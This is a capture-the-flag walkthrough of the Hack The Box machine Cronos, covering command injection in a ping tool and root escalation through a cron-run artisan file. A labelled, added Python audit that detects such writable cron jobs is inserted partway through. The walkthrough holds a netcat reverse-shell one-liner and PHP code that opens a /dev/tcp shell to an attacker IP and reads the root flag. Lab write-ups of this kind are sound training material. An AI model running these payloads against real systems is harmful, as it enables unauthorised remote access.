Cronos — HTB Machine
Today we are going to solve another machine called Cronos. I have fired it up and run my nmap script to give me initial scans, which show three ports open. Let’s dig deeper into those.
Upon visiting the webpage:
Clicking on Documentation takes me to the documentation page of Laravel.
Since everything was very simple and I couldn’t find anything, I tried both Gobuster and Sublist3r to find a vhost/subdomain of the parent domain, but for some reason I was unable to find anything. When I did some research, I found out I was on the right path, so I restarted the machine and tried again.
I was still not able to get any vhost from the machine.
Then I came across a command which helped me to get the value for the subdomain:
host -l <domain_name> <IP>
I will add admin.cronos.htb to the hosts file.
Upon loading the admin page I only got a simple login page, so I started dirsearch on the domain admin.cronos.htb.
Found config.php, but it was supposedly a rabbit hole.
Didn’t find anything in directory listing either.
We do have a cookie here
I tried SQL injection on the tool and found this:
Net tool is a tool that gives you two functionalities:
One → to traceroute
Two → to PING
Tampering with the Burp request for PING, I got command injection on the machine.
Since we have command injection, we can execute a command and then get a reverse shell.
Used this payload and URL-encoded it to run on the box:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
I changed the content of artisan and I did get a connection request, but it did not give me a reverse shell on my machine.
I tried some more times but it did not work, so I had to get creative to get the root flag.
Content of Artisan:
<?php
// Change these values accordingly
$ip = '10.10.14.6';
$port = 1456;
// Create a TCP/IP socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
// Attempt to connect to the provided IP and port
if (socket_connect($sock, $ip, $port) === false) {
    die('Could not connect to ' . $ip . ':' . $port . PHP_EOL);
}
// Set socket to non-blocking mode
socket_set_nonblock($sock);
// Spawn a shell
shell_exec('bash -c "bash -i >& /dev/tcp/' . $ip . '/' . $port . ' 0>&1"');
$output = shell_exec('cat /root/root.txt');
file_put_contents('/var/www/laravel', $output);
?>
>>>> root.txt has the content of root flag
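The root cron entry above runs a file that a non-root user was able to edit, which is the misconfiguration a defender should be able to detect. The following audit is an added example, not code from the original write-up: it parses /etc/crontab-style lines and flags root jobs whose script, or any parent directory, can be modified by a non-root user. The function names and the second sample crontab line are assumptions made for illustration.

```python
import os
import stat
from pathlib import PurePosixPath

# Constructed sample: line 2 is the crontab entry from the write-up, line 3 is hypothetical.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
* * * * *\troot\tphp /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
17 * * * *\twww-data\t/usr/local/bin/cleanup.sh
"""

def root_job_paths(crontab_text):
    """Absolute paths referenced by /etc/crontab-style jobs that run as root."""
    paths = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)  # 5 time fields, user, command
        if line.lstrip().startswith("#") or len(fields) < 7 or fields[5] != "root":
            continue
        paths += [t for t in fields[6].split() if t[:1] == "/" and t[:5] != "/dev/"]
    return paths

def writable_by_non_root(st):
    """True if a user other than root can modify or replace this entry."""
    if st.st_uid != 0:
        return True
    if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
        return False  # sticky directory: others cannot replace root's files
    if st.st_mode & stat.S_IWOTH:
        return True
    return bool(st.st_mode & stat.S_IWGRP) and st.st_gid != 0

def audit(crontab_text, stat_fn=os.stat):
    """(job path, weak component) pairs for the file and each parent directory."""
    findings = []
    for path in root_job_paths(crontab_text):
        target = PurePosixPath(path)
        for component in [target, *target.parents]:
            try:
                st = stat_fn(str(component))
            except OSError:
                continue  # missing component: nothing to inspect
            if writable_by_non_root(st):
                findings.append((path, str(component)))
    return findings

if __name__ == "__main__":
    text = open("/etc/crontab").read() if os.path.exists("/etc/crontab") else SAMPLE_CRONTAB
    for job, weak in audit(text):
        print(f"root cron job uses {job}: {weak} is writable by a non-root user")
```

A finding means the job should either run as the unprivileged owner of the file, or the file and every directory above it should be root-owned and not group- or world-writable.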
That is how we have PAWNED another machine for the day!! HAPPY HACKING UNTIL NEXT TIMEEE
My Review:
This box is a fundamental one, and you might have to think out of the box at the start and the end. Other than that, the journey in the middle is a breeze if you are up for it. There are several rabbit holes. SO MIND YOUR STEPS !! 😂😁